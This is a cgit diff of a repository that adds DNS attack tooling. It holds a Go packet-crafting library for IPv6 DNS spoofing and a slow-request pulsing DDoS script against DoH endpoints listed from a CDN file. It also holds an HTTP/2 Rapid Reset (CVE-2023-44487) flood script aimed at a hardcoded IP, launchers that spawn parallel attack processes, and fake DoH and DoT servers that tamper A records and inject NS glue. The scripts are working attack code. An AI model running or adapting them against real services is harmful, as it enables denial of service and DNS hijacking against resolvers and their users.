+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE=
+golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
+golang.org/x/tools v0.13.0 h1:Iey4qkscZuv0VvIt8E0neZjtPVQFSc870HQ448QgEmQ=
+golang.org/x/tools v0.13.0/go.mod h1:HvlwmtVNQAhOuCjW7xxvovg8wbNq7LwfXh/k7wXUl58=
+golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
diff --git a/5_v6_fake/src/ucr.edu/fakedns6/library.go b/5_v6_fake/src/ucr.edu/fakedns6/library.go
new file mode 100644
index 0000000..d75d0b8
--- /dev/null
+++ b/5_v6_fake/src/ucr.edu/fakedns6/library.go
@@ -0,0 +1,171 @@
+package main
+
+import (
+ "encoding/binary"
+ "errors"
+ "fmt"
+ "github.com/google/gopacket"
+ "github.com/google/gopacket/layers"
+ "github.com/google/gopacket/pcap"
+ "net"
+ "time"
+)
+
+func GetIfaceAddrMulti(iface *net.Interface) ([]net.IP, error) {
+ addrs, err := iface.Addrs()
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ var srcIP []net.IP
+ for _, address := range addrs {
+ if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
+ if ipnet.IP.To16() != nil {
+ //check repeat
+ okToAdd := true
+ for _, temp := range srcIP {
+ if compareIPv6Addr(temp, ipnet.IP.To16()) == 0 {
+ okToAdd = false
+ break
+ }
+ }
+ if okToAdd {
+ srcIP = append(srcIP, ipnet.IP.To16())
+ }
+ }
+ }
+ }
+
+ if srcIP == nil || len(srcIP) == 0 {
+ return nil, errors.New("can not get ip address")
+ }
+
+ return srcIP, nil
+}
+
+func Send(handle *pcap.Handle, l ...gopacket.SerializableLayer) error {
+ opts := gopacket.SerializeOptions{
+ FixLengths: true,
+ ComputeChecksums: true,
+ }
+ buffer := gopacket.NewSerializeBuffer()
+ if err := gopacket.SerializeLayers(buffer, opts, l...); err != nil {
+ return err
+ }
+ return handle.WritePacketData(buffer.Bytes())
+}
+
+func GetIfaceAddr(iface *net.Interface) (net.IP, error) {
+ addrs, err := iface.Addrs()
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ var srcIP net.IP
+ for _, address := range addrs {
+ if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
+ if ipnet.IP.To16() != nil {
+ srcIP = ipnet.IP.To16()
+ break
+ }
+ }
+ }
+
+ if srcIP == nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ return srcIP, nil
+}
+
+func GetGatewayAddr(iface *net.Interface, handle *pcap.Handle, gatewayIP net.IP) (net.HardwareAddr, error) {
+ srcIP, err := GetIfaceAddr(iface)
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ start := time.Now()
+ // Prepare the layers to send for an ARP request.
+ eth := layers.Ethernet{
+ SrcMAC: iface.HardwareAddr,
+ DstMAC: net.HardwareAddr{0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+ EthernetType: layers.EthernetTypeARP,
+ }
+ arp := layers.ARP{
+ AddrType: layers.LinkTypeEthernet,
+ Protocol: layers.EthernetTypeIPv6,
+ HwAddressSize: 6,
+ ProtAddressSize: 4,
+ Operation: layers.ARPRequest,
+ SourceHwAddress: []byte(iface.HardwareAddr),
+ SourceProtAddress: []byte(srcIP),
+ DstHwAddress: []byte{0, 0, 0, 0, 0, 0},
+ DstProtAddress: []byte(gatewayIP),
+ }
+ // Send a single ARP request packet (we never retry a send, since this
+ // is just an example ;)
+ if err := Send(handle, &eth, &arp); err != nil {
+ return nil, err
+ }
+ // Wait 3 seconds for an ARP reply.
+ for {
+ if time.Since(start) > time.Second*3 {
+ return nil, errors.New("timeout getting ARP reply")
+ }
+ data, _, err := handle.ReadPacketData()
+ if err == pcap.NextErrorTimeoutExpired {
+ continue
+ } else if err != nil {
+ return nil, err
+ }
+ packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy)
+ if arpLayer := packet.Layer(layers.LayerTypeARP); arpLayer != nil {
+ arp := arpLayer.(*layers.ARP)
+ if net.IP(arp.SourceProtAddress).Equal(gatewayIP) {
+ return arp.SourceHwAddress, nil
+ }
+ }
+ }
+}
+
+func compareIPv6Addr(ip0 net.IP, ip1 net.IP) int {
+ temp0 := binary.LittleEndian.Uint32(ip0.To16())
+ temp1 := binary.LittleEndian.Uint32(ip1.To16())
+ if temp0 == temp1 {
+ return 0
+ }
+ if temp0 > temp1 {
+ return 1
+ }
+ return -1
+}
+
+func xmitUDPv6(srcIP net.IP, dstIP net.IP, srcPort layers.UDPPort, dstPort layers.UDPPort, flowlabel uint32, timegap uint32) {
+
+ ipLayer := layers.IPv6{
+ FlowLabel: flowlabel,
+ SrcIP: srcIP,
+ DstIP: dstIP,
+ Version: 6,
+ HopLimit: 64,
+ NextHeader: layers.IPProtocolUDP,
+ }
+ udpLayer := layers.UDP{
+ SrcPort: srcPort,
+ DstPort: dstPort,
+ }
+
+ err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
+ if err != nil {
+ fmt.Println("xmitUDPv6 can not SetNetworkLayerForChecksum", err)
+ }
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer)
+ if err != nil {
+ fmt.Println("xmitUDPv6 can not send packet", err)
+ }
+
+ if timegap != 0 {
+ time.Sleep(time.Duration(timegap) * time.Microsecond)
+ }
+
+}
diff --git a/5_v6_fake/src/ucr.edu/fakedns6/saddns b/5_v6_fake/src/ucr.edu/fakedns6/saddns
new file mode 100644
index 0000000..c12f35b
--- /dev/null
+++ b/5_v6_fake/src/ucr.edu/fakedns6/saddns
Binary files differ
diff --git a/5_v6_fake/txid.bin b/5_v6_fake/txid.bin
new file mode 100644
index 0000000..2fe3cf9
--- /dev/null
+++ b/5_v6_fake/txid.bin
@@ -0,0 +1 @@
+fH \ No newline at end of file
diff --git a/5_v6_fake/说明文档.docx b/5_v6_fake/说明文档.docx
new file mode 100644
index 0000000..c5b1afa
--- /dev/null
+++ b/5_v6_fake/说明文档.docx
Binary files differ
diff --git a/6_dot_DDoS/att_pending_cookie.py b/6_dot_DDoS/att_pending_cookie.py
new file mode 100644
index 0000000..ce3e4de
--- /dev/null
+++ b/6_dot_DDoS/att_pending_cookie.py
@@ -0,0 +1,127 @@
+import argparse
+import http.client
+import asyncio
+import base64
+import random
+import secrets
+import string
+from collections import Counter
+import sys
+import time
+import requests
+import dns.message
+import httpx
+import gzip
+import io
+import pandas as pd
+import tqdm
+from concurrent.futures import ThreadPoolExecutor
+import threading
+from dns.message import make_query
+
+def ge_cookie():
+ cookie = ""
+ for i in range(200):
+ cookie += ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(4, 10)))+\
+ "="''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(8, 20)))+"; "
+ cookie = cookie[:-2]
+ #print(sys.getsizeof(cookie)/1024)
+ return cookie
+
+def send_request(event,url,t,latency,stime):
+ cookie = ge_cookie()
+ headers = {"content-type": "application/dns-message",
+ "accept": "application/dns-message",
+ "Surrogate-Control": "max-age=0", "Cache-Control": "max-age=0",
+ "Cookie":cookie}
+ message = dns.message.make_query(base64.b64encode(url.encode("utf-8")).decode("utf-8") +
+ ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))+ ".google.com", "A")
+ message.flags |= dns.flags.RD
+ dns_req = base64.b64encode(message.to_wire()).decode("UTF8").rstrip("=")
+ # time.sleep(t*2)
+ conn = http.client.HTTPConnection(url, port=80)
+
+
+ #time.sleep(3)
+ body = ','.join([f'{name}: {value}' for name, value in headers.items()])
+ request_line = "GET /dns-query?dns=" + f"{dns_req} HTTP/1.1\r\n"
+ conn.send(request_line.encode())
+ headers0 = {'host': 'www.doeresearch.site'}
+ headers0 = ''.join([f'{name}: {value}\r\n' for name, value in headers0.items()])
+ conn.send(headers0.encode())
+
+ #time.sleep(10)
+ #body = str(make_query(qname="baidu.com", rdtype="A", want_dnssec=False))
+ #print(body)
+ #print(len(body))
+ chunk_size = 20 # 每个块的大小
+ for i in range(0, len(body), chunk_size):
+ #print(i,'------------------')
+ chunk = body[i:i + chunk_size]
+ conn.send(f'{chunk}'.encode())
+ start_time = time.perf_counter()
+ while time.perf_counter() - start_time < 0.002:
+ pass
+ # print('P')
+ conn.send(b'\r\n')
+ # 发送结束标志
+ #print(url, t, 'pending')
+ desired_time = latency / 2000 # 将毫秒转换为秒
+ #conn.close()
+ #time.sleep(10)
+ event.wait()
+ # start_time = time.perf_counter()
+ # while time.perf_counter() - start_time < desired_time:
+ # pass
+ #conn.send(b'0\r\n\r\n')
+ conn.send(b'\r\n')
+ # Get the response
+ #response = conn.getresponse()
+ # print(response.status, response.reason)
+ #print(response.read())
+ # print(dns.message.from_wire(response.read()))
+
+ #conn.close()
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-stime', '--stime')
+ parser.add_argument('-round', '--round',default=10)
+ parser.add_argument('-wait', '--wait',default=180)
+ args = parser.parse_args()
+
+
+ path = '/root/Nora/cdn/'
+ #path = 'D:\Volumes\调研\项目\YYDNS\GJ\DDOS/'
+ df = pd.read_csv(path+'fastly_att.csv',nrows=64)
+ data = df.set_index('ip')['latency'].to_dict()
+ event = threading.Event()
+ s_time = time.time()
+ #stime = time.perf_counter()
+ stime = float(args.stime)
+ round = int(args.round)
+ wait_time = int(args.wait)
+ threads = []
+ for i in range(round):
+ for ip, latency in data.items():
+ t = threading.Thread(target=send_request, args=(event,ip, i, latency,stime))
+ t.start()
+ threads.append(t)
+ #time.sleep(latency)
+ start_time = time.perf_counter()
+ # while time.perf_counter() - start_time < 0.1:
+ # pass
+ print('all waiting')
+ while time.perf_counter() - stime < wait_time:
+ pass
+ # 触发事件,同时释放所有线程
+ event.set()
+ # 等待所有线程完成
+ for t in threads:
+ t.join()
+ print('ATT over:',time.time() - s_time)
+ #for i in tqdm.tqdm(range(1000)):
+ #send_request("151.101.76.204",0,0,0)
+
+
+
diff --git a/6_dot_DDoS/start_pending.py b/6_dot_DDoS/start_pending.py
new file mode 100644
index 0000000..5e7edf0
--- /dev/null
+++ b/6_dot_DDoS/start_pending.py
@@ -0,0 +1,20 @@
+import os
+import argparse
+import time
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-n', '--n', default=3)
+parser.add_argument('-round', '--round', default=5)
+parser.add_argument('-wait', '--wait', default=150)
+args = parser.parse_args()
+stime = time.perf_counter()
+round = int(args.round)
+wait_time = int(args.wait)
+for i in range(int(args.n)):
+ #print(f"python3 cve44487.py -s {i}")
+ os.popen(f"python att_pending_cookie.py -stime {stime} -round {round} -wait {wait_time}")
+while True:
+ current_time = time.perf_counter()
+ elapsed_time = current_time - stime
+ print(f"经过的时间:{elapsed_time:.2f}秒", end="\r")
+ time.sleep(1) # 暂停一秒钟 \ No newline at end of file
diff --git a/6_dot_DDoS/脉冲拒绝服务.pdf b/6_dot_DDoS/脉冲拒绝服务.pdf
new file mode 100644
index 0000000..9f938c9
--- /dev/null
+++ b/6_dot_DDoS/脉冲拒绝服务.pdf
Binary files differ
diff --git a/7_doh_DDoS/HTTP2快速重置拒绝服务.pdf b/7_doh_DDoS/HTTP2快速重置拒绝服务.pdf
new file mode 100644
index 0000000..b9198d5
--- /dev/null
+++ b/7_doh_DDoS/HTTP2快速重置拒绝服务.pdf
Binary files differ
diff --git a/7_doh_DDoS/cve44487.py b/7_doh_DDoS/cve44487.py
new file mode 100644
index 0000000..5154f06
--- /dev/null
+++ b/7_doh_DDoS/cve44487.py
@@ -0,0 +1,152 @@
+import random
+import ssl
+import string
+import sys
+import csv
+import socket
+import argparse
+import time
+import dns.message
+from datetime import datetime
+from urllib.parse import urlparse
+from http.client import HTTPConnection, HTTPSConnection
+import base64
+from dns.message import make_query
+import tqdm
+from h2.connection import H2Connection
+from h2.config import H2Configuration
+import h2.events
+import httpx
+import requests
+import asyncio
+import warnings
+
+warnings.filterwarnings("ignore")
+async def multi_h2(id_start,conn,h2_conn,host,dns_req):
+ for stream_id in tqdm.tqdm(range(id_start,id_start+1000000,2)):
+ #print('stream_id',stream_id)
+ headers = [(':method', 'GET'), (':authority', host), (':scheme', 'https'),
+ (':path', '/dns-query' + '?dns=' + dns_req),
+ ("accept", "application/dns-message"),
+ ("content-type", "application/dns-message")]
+ #print(headers)
+ h2_conn.send_headers(stream_id, headers)
+ conn.send(h2_conn.data_to_send())
+
+ h2_conn.reset_stream(stream_id)
+ conn.send(h2_conn.data_to_send())
+
+
+
+
+def send_rst_stream_h2(host, sid,port=443, uri_path='/dns-query', timeout=5, proxy=None):
+ """
+ Send an RST_STREAM frame to the given host and port.
+ Parameters:
+ host (str): The hostname.
+ port (int): The port number.
+ stream_id (int): The stream ID to reset.
+ uri_path (str): The URI path for the GET request.
+ timeout (int): The timeout in seconds for the socket connection.
+ proxy (str): The proxy URL, if any.
+ Returns:
+ tuple: (status, message)
+ status: 1 if successful, 0 if no response, -1 otherwise.
+ message: Additional information or error message.
+ """
+
+ body = make_query(qname="baidu.com", rdtype="A", want_dnssec=False).to_wire()
+
+ #try:
+ # Create an SSL context to ignore SSL certificate verification
+ ssl_context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
+ ssl_context.options |= (
+ ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
+ )
+ ssl_context.options |= ssl.OP_NO_COMPRESSION
+ ssl_context.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20")
+ ssl_context.set_alpn_protocols(['h2'])
+ ssl_context.check_hostname = False
+ ssl_context.verify_mode = ssl.CERT_NONE
+
+ # Create a connection based on whether a proxy is used
+ conn = HTTPSConnection(host, port, timeout=timeout, context=ssl_context)
+ conn.connect()
+ #time.sleep(2)
+ # Initiate HTTP/2 connection
+ config = H2Configuration(client_side=True)
+ h2_conn = H2Connection(config=config)
+ h2_conn.initiate_connection()
+ conn.send(h2_conn.data_to_send())
+ #time.sleep(2)
+ # Send GET request headers
+ #time.sleep(2)
+ # Listen for frames and send RST_STREAM when appropriate
+ #print(sid)
+ flag = 0
+ s_time = time.time()
+ #for stream_id in tqdm.tqdm(range(sid*999999,sid*999999+1000000,2)):
+ for stream_id in range(sid * 999999, sid * 999999 + 200000, 2):
+ # flag += 1
+ # if time.time()-s_time>1:
+ # print(flag)
+ # break
+ # if flag>50:
+ # data = conn.sock.recv(65535)
+ # start_time = time.perf_counter()
+ # while time.perf_counter() - start_time < 0.1:
+ # pass
+ #flag = 0
+ #print('stream_id',stream_id)
+ suff = base64.b64encode(str(stream_id).encode("utf-8")).decode("utf-8")+ ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
+ message = dns.message.make_query(f"{suff}.www.baidu.com", "A")
+ message.flags |= dns.flags.RD
+ dns_req = base64.b64encode(message.to_wire()).decode("UTF8").rstrip("=")
+
+ headers = [(':method', 'GET'), (':authority', host), (':scheme', 'https'),
+ (':path', uri_path + '?dns=' + dns_req),
+ ("accept", "application/dns-message"),
+ ("content-type", "application/dns-message")]
+
+ # headers = [(':method', 'POST'), (':authority', host), (':scheme', 'https'),
+ # (':path', uri_path),
+ # ("accept", "application/dns-message"),
+ # ("content-type", "application/dns-message")]
+ #print(headers)
+ h2_conn.send_headers(stream_id, headers)
+ conn.send(h2_conn.data_to_send())
+ # h2_conn.send_data(stream_id, body)
+ # conn.send(h2_conn.data_to_send())
+ h2_conn.end_stream(stream_id)
+ conn.send(h2_conn.data_to_send())
+ # data = conn.sock.recv(100)
+ # events = h2_conn.receive_data(data)
+ # print('events:\n', events)
+ # start_time = time.perf_counter()
+ # while time.perf_counter() - start_time < 0.05:
+ # pass
+ h2_conn.reset_stream(stream_id)
+ conn.send(h2_conn.data_to_send())
+
+
+ #break
+ conn.close()
+ return ("over")
+ # except Exception as e:
+ # print('error------------')
+ # return (-1, f"send_rst_stream_h2 ---- {e}")
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-s', '--sid',default=1)
+ args = parser.parse_args()
+
+ targets = ["8.218.236.77"]
+ #targets = ['108.61.195.177']
+ for i in targets:
+
+ now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
+ print(now,f"Checking {i}...", file=sys.stderr)
+ send_rst_stream_h2(i,int(args.sid))
+ #print("send rst stream:", resp, err2)
+
diff --git a/7_doh_DDoS/start_reset_att.py b/7_doh_DDoS/start_reset_att.py
new file mode 100644
index 0000000..b61fc2d
--- /dev/null
+++ b/7_doh_DDoS/start_reset_att.py
@@ -0,0 +1,26 @@
+import argparse
+import os
+import time
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-n', '--n', default=1)
+args = parser.parse_args()
+
+streams = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19,21,23,25,27,29,31]
+for i in streams[:int(args.n)]:
+ #print(f"python3 cve44487.py -s {i}")
+ os.popen(f"python cve44487.py -s {i}")
+
+# for j in range(100):
+# for i in streams[:int(args.n)]:
+# # #print(f"python3 cve44487.py -s {i}")
+# os.popen(f"python cve44487.py -s {i}")
+# start_time = time.perf_counter()
+# while time.perf_counter() - start_time < 0.1:
+# pass
+# for i in streams[int(args.n):]:
+# # #print(f"python3 cve44487.py -s {i}")
+# os.popen(f"python cve44487.py -s {i}")
+# start_time = time.perf_counter()
+# while time.perf_counter() - start_time < 1:
+# pass \ No newline at end of file
diff --git a/8_doh_fake/DoH数据篡改.pdf b/8_doh_fake/DoH数据篡改.pdf
new file mode 100644
index 0000000..a5237fa
--- /dev/null
+++ b/8_doh_fake/DoH数据篡改.pdf
Binary files differ
diff --git a/8_doh_fake/fake_DoH.py b/8_doh_fake/fake_DoH.py
new file mode 100644
index 0000000..02f3829
--- /dev/null
+++ b/8_doh_fake/fake_DoH.py
@@ -0,0 +1,63 @@
+import argparse
+import base64
+import ssl
+import dns.asyncquery
+import dns.rcode
+import aiohttp
+import dns.message
+import dns.rrset
+from aiohttp import web
+
+DNS_SERVER_ADDRESS = '223.5.5.5'
+DNS_SERVER_PORT = 53
+
+async def doh_handler(request):
+ if request.method == "GET":
+ rquery = str(request.query).split(' ')[1]
+ #print(rquery)
+ rquery = rquery.ljust(len(rquery) + len(rquery) % 4, "=")
+ doh_request = dns.message.from_wire(base64.b64decode(rquery.encode("UTF8")))
+ else:
+ try:
+ doh_request = dns.message.from_wire(await request.read())
+ except :
+ return web.Response(text='Invalid DNS request', status=400)
+
+ dns_request = dns.message.make_query(doh_request.question[0].name, doh_request.question[0].rdtype)
+ dns_request.id = doh_request.id
+ # 发起DNS请求
+ dns_response = await dns.asyncquery.udp(q = dns_request, port=DNS_SERVER_PORT, where=DNS_SERVER_ADDRESS)
+ #print(dns_response)
+
+ if str(doh_request.question[0].name) == tamper and int(doh_request.question[0].rdtype)==1:
+ print('---tamper---',tamper)
+ dns_response.answer = [ dns.rrset.from_text(tamper,3600,dns.rdataclass.IN, dns.rdatatype.A,'39.106.44.126')]
+ if str(doh_request.question[0].name) == inject:
+ print('---inject---',inject)
+ dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+ dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+ #print(dns_response)
+ # 构建HTTPS响应
+ response = web.Response(body=dns_response.to_wire())
+ response.content_type = 'application/dns-message'
+ return response
+
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+#print('tamper:',tamper)
+DOH_SERVER_URL = "https://dns.alidns.com/dns-query"
+CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"
+KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"
+ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ssl_context.load_cert_chain(CERT_FILE, KEY_FILE)
+app = web.Application()
+app.router.add_get(path='/dns-query',handler=doh_handler)
+app.router.add_post(path='/dns-query',handler=doh_handler)
+web.run_app(app, host='127.0.0.1', port=8444, ssl_context=ssl_context) \ No newline at end of file
diff --git a/9_dot_fake/DoT数据篡改.pdf b/9_dot_fake/DoT数据篡改.pdf
new file mode 100644
index 0000000..d6acd8c
--- /dev/null
+++ b/9_dot_fake/DoT数据篡改.pdf
Binary files differ
diff --git a/9_dot_fake/dot_stub.py b/9_dot_fake/dot_stub.py
new file mode 100644
index 0000000..3c35dc7
--- /dev/null
+++ b/9_dot_fake/dot_stub.py
@@ -0,0 +1,45 @@
+import socket
+import ssl
+import dns.message
+import dns.query
+import dns.rcode
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-dot', '--dot', default='dns.alidns.com')
+args = parser.parse_args()
+print(f'DoT server: {args.dot}')
+upstream_server = '47.88.31.213'
+
+# 创建监听socket
+listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+listener.bind(('127.0.0.1', 53))
+
+# 创建TLS连接
+context = ssl.create_default_context()
+context.check_hostname = False
+context.verify_mode = ssl.CERT_NONE
+while True:
+ # 接收DNS请求
+ data, addr = listener.recvfrom(1024)
+ #print(dns.message.from_wire(data))
+ data = dns.message.from_wire(data)
+ if 'baidu' in data.question.__str__():
+ # print(data)
+ # print(addr)
+ print('DNS请求:', data.question)
+ # # 创建TLS连接并发送DNS请求到上游服务器
+ resp = dns.query.tls(
+ q=data,
+ where=upstream_server,
+ timeout=10,
+ ssl_context=context)
+ print('DNS响应:', resp.answer)
+ # with socket.create_connection((upstream_server,853)) as sock:
+ # with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
+ # tls_sock.sendall(data.to_wire())
+ # resp = tls_sock.recv(4096)
+
+ # 将上游服务器的响应发送回客户端
+ listener.sendto(resp.to_wire(), addr)
+ break
diff --git a/9_dot_fake/fake_DoT.py b/9_dot_fake/fake_DoT.py
new file mode 100644
index 0000000..4e45754
--- /dev/null
+++ b/9_dot_fake/fake_DoT.py
@@ -0,0 +1,63 @@
+import argparse
+import asyncio
+import ssl
+import socket
+import dns.asyncquery
+import dns.message
+import dns.rcode
+import dns.flags
+import dns.message
+import dns.rrset
+from dnslib import DNSRecord
+
+async def handle_client(reader, writer):
+ request_data = await reader.read(1024)
+ request = dns.message.from_wire(request_data[2:])
+ #print(request)
+ dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
+ dns_request.id = request.id
+ #print(dns_request)
+ dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
+ #print(dns_response)
+ if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
+ print('---tamper---', tamper)
+ dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
+ if str(request.question[0].name) == inject:
+ print('---inject---', inject)
+ dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+ dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+ #print(dns_response)
+
+ response_data = dns_response
+ record_header = len(response_data.to_wire()).to_bytes(2, 'big')
+ # 构建完整的TLS响应数据
+ tls_response_data = record_header + response_data.to_wire()
+ writer.write(tls_response_data)
+ await writer.drain()
+ writer.close()
+
+async def start_server():
+ # 配置服务器参数
+ listen_address = '0.0.0.0'
+ listen_port = 853
+ CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt" # 替换为你的SSL证书文件路径
+ KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key" # 替换为你的SSL密钥文件路径
+ context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
+ # 创建TCP服务器
+ server = await asyncio.start_server(
+ handle_client, listen_address, listen_port, ssl=context)
+
+ print(f'DoT server listening on {listen_address}:{listen_port}')
+ async with server:
+ await server.serve_forever()
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+asyncio.run(start_server()) \ No newline at end of file
diff --git a/test/shuchu b/test/shuchu
new file mode 100755
index 0000000..0a54e22
--- /dev/null
+++ b/test/shuchu
Binary files differ
generated by cgit v1.2.3 (git 2.39.1) at 2025-12-30 11:49:22 +0000